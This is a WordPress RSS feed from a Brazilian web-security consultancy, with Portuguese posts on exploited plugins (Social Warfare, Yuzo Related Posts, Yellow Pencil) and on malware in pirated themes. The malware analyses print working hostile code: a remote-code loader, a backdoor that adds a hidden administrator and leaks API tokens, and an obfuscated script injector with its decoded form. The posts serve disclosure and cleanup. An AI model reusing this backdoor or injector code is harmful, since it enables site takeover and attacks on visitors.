<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos segurança - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/seguranca/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/seguranca/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Tue, 20 Sep 2022 17:37:19 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos segurança - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/seguranca/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Vulnerabilidades sendo exploradas no plugin Social Warfare</title>
		<link>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Thu, 25 Apr 2019 03:49:16 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabildiade de plugins]]></category>
		<category><![CDATA[vulnerabildiade wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=236</guid>

					<description><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha. O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha.</p>
<p>O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:</p>
<p><img fetchpriority="high" decoding="async" class="alignnone wp-image-107 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg" alt="" width="574" height="270" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg 574w, https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270-300x141.jpg 300w" sizes="(max-width: 574px) 100vw, 574px" /></p>
<p>A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.</p>
<h3>Fazendo o teste:</h3>
<p>Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:</p>
<p>&nbsp;</p>
<p>E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.</p>
<h3>Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:</h3>
<p>Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no <a href="https://www.ethsecurity.com.br/2019/04/19/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">post do Yuzo Related Posts</a></p>
<p>Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.</p>
<h3>Solução:</h3>
<p>Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">236</post-id>	</item>
		<item>
		<title>Por que não utilizar temas e plugins piratas.</title>
		<link>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/</link>
					<comments>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Tue, 23 Apr 2019 12:36:32 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[plugin pirata]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[tema nulled]]></category>
		<category><![CDATA[tema pirata]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=209</guid>

					<description><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise. Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise.</p>
<p>Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:</p>
<p>./wp-content/themes/twentynineteen/functions.php<br />
./wp-content/themes/twentyseventeen/functions.php<br />
./wp-content/themes/twentysixteen/functions.php<br />
./wp-includes/post.php<br />
./wp-includes/wp-tmp.php<br />
./wp-includes/wp-vcd.php</p>
<p>Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:</p>
<p>elseif ($tmpcontent = @file_get_contents(&#8220;http://www. harors .pw/code .php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {</p>
<p>if (stripos($tmpcontent, $wp_auth_key) !== false) {<br />
extract(theme_temp_setup($tmpcontent));<br />
@file_put_contents(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;, $tmpcontent);</p>
<p>if (!file_exists(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;)) {<br />
@file_put_contents(get_template_directory() . &#8216;/wp-tmp.php&#8217;, $tmpcontent);<br />
if (!file_exists(get_template_directory() . &#8216;/wp-tmp.php&#8217;)) {<br />
@file_put_contents(&#8216;wp-tmp.php&#8217;, $tmpcontent);</p>
<p>verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:</p>
<p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;//deloplen .com/ apu.php?zoneid=2542869&#8243; async data-cfasync=&#8221;false&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;//pushqwer .com/ ntfc.php?p=2542872&#8243; data-cfasync=&#8221;false&#8221; async&gt;&lt;/script&gt;</p>
<p>Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso &#8220;O site a seguir contém conteúdo malicioso ou enganoso&#8221;.</p>
<p>Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.</p>
<p>Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:</p>
<p>require $_SERVER[&#8216;DOCUMENT_ROOT&#8217;].&#8217;/wp-load.php&#8217;;<br />
$table_name = $wpdb-&gt;get_blog_prefix();<br />
$sample = &#8216;a:1:{s:13:&#8221;administrator&#8221;;b:1;}&#8217;;<br />
if( isset($_GET[&#8216;ok&#8217;]) ) { echo &#8216;&lt;!&#8211; Silence is golden. &#8211;&gt;&#8217;;}<br />
if( isset($_GET[&#8216;awu&#8217;]) ) {<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (&#8216;100010010&#8217;, &#8216;100010010&#8217;, &#8216;\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.&#8217;, &#8216;100010010&#8217;, &#8216;te@ea.st&#8217;, &#8221;, &#8216;2011-06-07 00:00:00&#8217;, &#8221;, &#8216;0&#8217;, &#8216;100010010&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, &#8216;100010010&#8217;, &#8216;{$table_name}capabilities&#8217;, &#8216;{$sample}&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, &#8216;100010010&#8217;, &#8216;{$table_name}user_level&#8217;, &#8217;10&#8217;);&#8221;); }<br />
if( isset($_GET[&#8216;dwu&#8217;]) ) { $wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;users WHERE `ID` = 100010010&#8221;);<br />
$wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;usermeta WHERE $wpdb-&gt;usermeta.`umeta_id` = 100010010&#8221;);}<br />
if( isset($_GET[&#8216;key&#8217;]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo &#8216;&lt;center&gt;&lt;h2&gt;&#8217; . esc_attr( $options[&#8216;user_name&#8217;] . &#8216;:&#8217; . esc_attr( $options[&#8216;api_key&#8217;])) . &#8216;&lt;br&gt;&#8217;;<br />
echo esc_html( envato_market()-&gt;get_option( &#8216;token&#8217; ) ); echo &#8216;&lt;/center&gt;&lt;/h2&gt;&#8217;; }</p>
<p>Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):</p>
<p>| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |</p>
<p>Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.</p>
<h3>Conclusão:</h3>
<p>Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.</p>
<p>Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">209</post-id>	</item>
		<item>
		<title>[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</title>
		<link>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/</link>
					<comments>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 19 Apr 2019 12:06:24 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[remoção de malwares]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=138</guid>

					<description><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz que a falha seja explorada.</p>
<p><iframe width="1200" height="675" src="https://www.youtube.com/embed/0iJeesXerGs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Infecção:</h3>
<p>Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:</p>
<p><strong><code class="plain">&lt;script language=javascript&gt;</code></strong><strong><code class="functions">eval</code></strong><strong><code class="plain">(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));&lt;/script&gt;</code></strong></p>
<p>O código descriptografado fica dessa maneira:</p>
<p><strong>&lt;/style&gt;&lt;script language=javascript&gt;var elem = document.createElement(&#8216;script&#8217;);</strong></p>
<p><strong>elem.type = &#8216;text/javascript&#8217;;</strong></p>
<p><strong>elem.async = true; elem.src = &#8216;hxxps://hellofromhony[.]org/counter&#8217;;</strong></p>
<p><strong>document.getElementsByTagName(&#8216;head&#8217;)[0].appendChild(elem);&lt;/script&gt;</strong></p>
<p>Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>Removendo a infecção:</h3>
<p>Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.</p>
<p>Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string &#8220;String.fromCharCode(118&#8221; ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:</p>
<p><img decoding="async" class="size-medium wp-image-161 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png" alt="" width="300" height="240" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to.png 631w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>Após isso você verá que o conteúdo foi encontrado na tabela wp_options:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-162" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png" alt="" width="328" height="262" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2.png 631w" sizes="auto, (max-width: 328px) 100vw, 328px" /></p>
<p>Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>&nbsp;</p>
<h3><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-90" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png" alt="" width="300" height="225" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-768x576.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-700x525.png 700w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234.png 770w" sizes="auto, (max-width: 300px) 100vw, 300px" /></h3>
<p>Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:</p>
<p>https://wordpress.org/support/topic/remove-this-plugin-immediately/</p>
<p>Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:</p>
<p>&nbsp;</p>
<p>RewriteEngine on<br />
ErrorDocument 406 &#8220;&lt;head&gt;&lt;title&gt;Bad Request!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Blocked by Defensor Web!&lt;/h1&gt;&lt;p&gt;Hacking Attempt!. &lt;/p&gt;&lt;/body&gt;&lt;/html&gt;&#8221;<br />
RewriteEngine On<br />
RewriteCond %{THE_REQUEST} &#8220;POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1&#8221; [NC]<br />
RewriteRule .* – [R=406,L]</p>
<p>&nbsp;</p>
<p>As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:</p>
<p><a href="https://pastebin.com/GKYBv5Qt">https://pastebin.com/GKYBv5Qt</a></p>
<p>&nbsp;</p>
<p>Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">138</post-id>	</item>
		<item>
		<title>Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</title>
		<link>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sat, 13 Apr 2019 15:02:39 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabilidade yellow pencil]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=106</guid>

					<description><![CDATA[<p>    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<blockquote>
<p style="text-align: left;">    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha descoberta.</p>
</blockquote>
<p>&nbsp;</p>
<h3>    Escalonamento de privilégio que permite a alteração na tabela wp_options:</h3>
<p>A primeira parte da falha está presente no arquivo yellow-pencil.php, que possui um função que é chamada a cada carregamento de página para verificar se o parâmetro yp_remote_get foi definido, em caso afirmativo o plugin eleva o privilégio para de  um administrador do WordPress  para concluir a solicitação.</p>
<p>&nbsp;</p>
<h3>    Como essa falha vem sendo explorada:</h3>
<p>Como a falha concede acesso para que o conteúdo da tabela wp_options seja alterado, informações sensíveis a segurança estão sendo alteradas, como email do administrador e a URL do site, assim quando o site é acessado o usuário é redirecionado para sites malicioso que tem como objetivo infectar os computadores dos usuários, trazendo assim sérios prejuízos  para a imagem do site na internet e no ranqueamento do Google, o que é um transtorno e tanto para quem deseja ter uma presença online de sucesso.</p>
<p>&nbsp;</p>
<h3>O que fazer caso seu site utilize este plugin:</h3>
<p>Caso você utilize esse plugin há grandes chances de sei site estar infectado, em caso afirmativo você pode utilizar o sitecheck do portal Sucuri para detectar a url maliciosa, porém recomendamos que esse plugin seja removido de sua instalação até que uma atualização de segurança seja disponibilizada.</p>
<p>Caso mesmo assim você precise utilizar esse plugin em seu site e não posso substituí-lo ou removê-lo recomendamos que utilize o firewall do <a href="https://www.wordfence.com/">Wordfence</a> na versão premium, que já possui uma proteção para essa exploração.</p>
<p>&nbsp;</p>
<h3> Update!</h3>
<p>O plugin Yellow Pencil publicou na data de hoje uma atualização para a falha relatada neste post, fizemos os devidos testes com a nova versão conforme o link para atualização:</p>
<p>https://yellowpencil.waspthemes.com/docs/important-security-update/</p>
<p>Com base nos testes a falha foi devidamente fechada, então caso você possua esse plugin em seu WordPress realize o update imediatamente.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>&nbsp;</p>
<p>E aí? o que acharam? fiquem a vontade para se expressar nos comentários, também podem realizar perguntas que nossa equipe terá prazer em respondê-las.</p>
<p>&nbsp;</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
